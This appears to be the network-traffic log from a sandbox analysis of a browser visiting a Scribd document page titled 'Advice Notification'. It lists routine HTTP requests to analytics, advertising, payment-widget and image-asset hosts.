    Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/24721610109.js HTTP/1.1Host: cdn.optimizely.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /7.19.0/bundle.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://www.scribd.comsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js HTTP/1.1Host: js.stripe.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://js.stripe.com/v3/m-outer-3437aaddcdf6922d623e172c2d6f9278.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/t2_9t33vcn2_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ads/pixel.js HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pixels/t2_9t33vcn2/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://www.scribd.comSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ping.min.js HTTP/1.1Host: cdn.pdst.fmConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /A3071581-5350-42cd-80be-79cdd173e0991.js HTTP/1.1Host: utt.impactcdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /bat.js HTTP/1.1Host: bat.bing.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /js/24721610109.js HTTP/1.1Host: cdn.optimizely.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /7.19.0/bundle.min.js HTTP/1.1Host: browser.sentry-cdn.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v3/fingerprinted/js/m-outer-15a2b40a058ddff1cffdb63779fe3de1.js HTTP/1.1Host: js.stripe.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ads/conversions-config/v1/pixel/config/t2_9t33vcn2_telemetry HTTP/1.1Host: www.redditstatic.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pixels/t2_9t33vcn2/config HTTP/1.1Host: pixel-config.reddit.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=b1114f61-c277-4039-98e0-e4f4bd727b42&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=fee98000-b35d-4415-8e95-c2af9a8a4149&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1Host: t.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /inner.html HTTP/1.1Host: m.stripe.networkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://js.stripe.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/310560108/149x198/44055ac324/1733356526?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/224410406/149x198/b245e05319/1731318738?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=b1114f61-c277-4039-98e0-e4f4bd727b42&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=fee98000-b35d-4415-8e95-c2af9a8a4149&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1Host: analytics.twitter.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /s.js HTTP/1.1Host: cdn.siftscience.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /sp.pl?a=10000&d=Fri%2C%2006%20Dec%202024%2021%3A59%3A27%20GMT&n=5&b=Advice%20Notification%20%7C%20PDF&.yp=10143699&f=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&enc=UTF-8&gdpr=0&us_privacy=1-N-&gpp=DBACOe~CQJNnEAQJNnEAEXikAENA0EwAP_gAEPgACiQGpQCgAGgAcABoAEUAJgAUABHALhAXmA1IC84A4AHAAaABFACYAFAARwC8wAA~BQJNnEAQJNnEAEXikAENA0CgAf_AAIfAAAalAKAAaABwAGgARQAmABQAEcAuEBeYDUgLzgDgAcABoAEUAJgAUABHALzA~1-N-&gpp_sid=6&yv=1.16.5&tagmgr=gtm HTTP/1.1Host: sp.analytics.yahoo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /td/rul/991817613?random=1733522375967&cv=11&fst=1733522375967&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4c40v9178425511z878386455za201zb78386455&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification&hn=www.googleadservices.com&frm=0&tiba=Advice%20Notification%20%7C%20PDF&npa=0&us_privacy=1-N-&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1 HTTP/1.1Host: td.doubleclick.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: test_cookie=CheckForPermission
    Source: global trafficHTTP traffic detected: GET /img/word_document/322011392/149x198/75a60db5ed/1732968212?v=1 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/356032151/149x198/db7a11388a/1731623834?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /pagead/form-data/991817613?gtm=45be4c40p3v9178425511z878386455za201zb78386455&gcs=G1--&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&npa=0&frm=0&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&ec_mode=a&em=tv.1 HTTP/1.1Host: google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.googletagmanager.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /ccm/form-data/991817613?gtm=45be4c40p3v9178425511z878386455za201zb78386455&gcs=G1--&gcd=13l3l3l3l5l1&dma=0&tcfd=10000&tag_exp=101925629~102067555~102067808~102081485&npa=0&frm=0&pscdl=noapi&auid=1182281480.1733522361&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.132%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.132&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&ec_mode=a&em=tv.1 HTTP/1.1Host: google.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*X-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://www.googletagmanager.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/308030757/149x198/2af38cbda9/1731726615?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/309859835/149x198/394d1573f0/1716986829?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/224266633/149x198/196f9b9902/1731728881?v=1 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/211302755/149x198/e130bab094/1733400677?v=1 HTTP/1.1Host: imgv2-2-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/263504218/149x198/5791495c90/1733362199?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://www.scribd.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/224410406/149x198/b245e05319/1731318738?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /img/word_document/310560108/149x198/44055ac324/1733356526?v=1 HTTP/1.1Host: imgv2-1-f.scribdassets.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=b1114f61-c277-4039-98e0-e4f4bd727b42&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=fee98000-b35d-4415-8e95-c2af9a8a4149&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1Host: t.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: muc_ads=2483231b-cc38-466c-aba5-a253066bdc53; __cf_bm=chNrjQ8Lch28S5lOa3Si64I9cftb.x6ifHyJn0JddKQ-1733522378-1.0.1.1-oGj2RIBts1knJnzL5Xn6qILftQDpAz.5kkPSQytfx7H07LNbgaUBPATZrDPgtwu2UeKOzEpUcVJkwu9i0_rGOg
    Source: global trafficHTTP traffic detected: GET /out-4.5.44.js HTTP/1.1Host: m.stripe.networkConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://m.stripe.network/inner.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /v1/ingest HTTP/1.1Host: pixels.spotify.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /i/adsct?bci=3&dv=America%2FNew_York%26en-US%2Cen%26Google%20Inc.%26Win32%26255%261280%261024%264%2624%261280%26984%260%26na&eci=2&event_id=b1114f61-c277-4039-98e0-e4f4bd727b42&events=%5B%5B%22pageview%22%2C%7B%7D%5D%5D&integration=advertiser&p_id=Twitter&p_user_id=0&pl_id=fee98000-b35d-4415-8e95-c2af9a8a4149&tw_document_href=https%3A%2F%2Fwww.scribd.com%2Fdocument%2F801519291%2FAdvice-Notification%23fullscreen%26from_embed&tw_iframe_status=0&tw_order_quantity=0&tw_sale_amount=0&txn_id=nzbvs&type=javascript&version=2.3.31 HTTP/1.1Host: analytics.twitter.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: personalization_id="v1_GaFna+OYzedzGqXlkIr+8A=="
